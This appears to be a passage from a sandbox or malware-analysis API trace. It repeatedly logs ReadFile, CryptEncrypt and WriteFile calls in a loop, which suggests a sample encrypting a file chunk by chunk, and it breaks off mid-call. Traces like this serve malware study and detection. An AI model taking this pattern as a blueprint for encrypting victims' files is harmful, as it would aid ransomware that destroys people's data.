ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.833] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.833] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.834] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.834] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.835] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.835] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.836] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.836] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.837] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.837] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.838] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.838] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.839] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.839] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] ReadFile (in: hFile=0x5d48, lpBuffer=0x2f5cda8, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5cda8*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.840] CryptEncrypt (in: hKey=0x2fb308, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5cda8*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.840] WriteFile (in: hFile=0x5d3c, lpBuffer=0x2f5cda8*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, 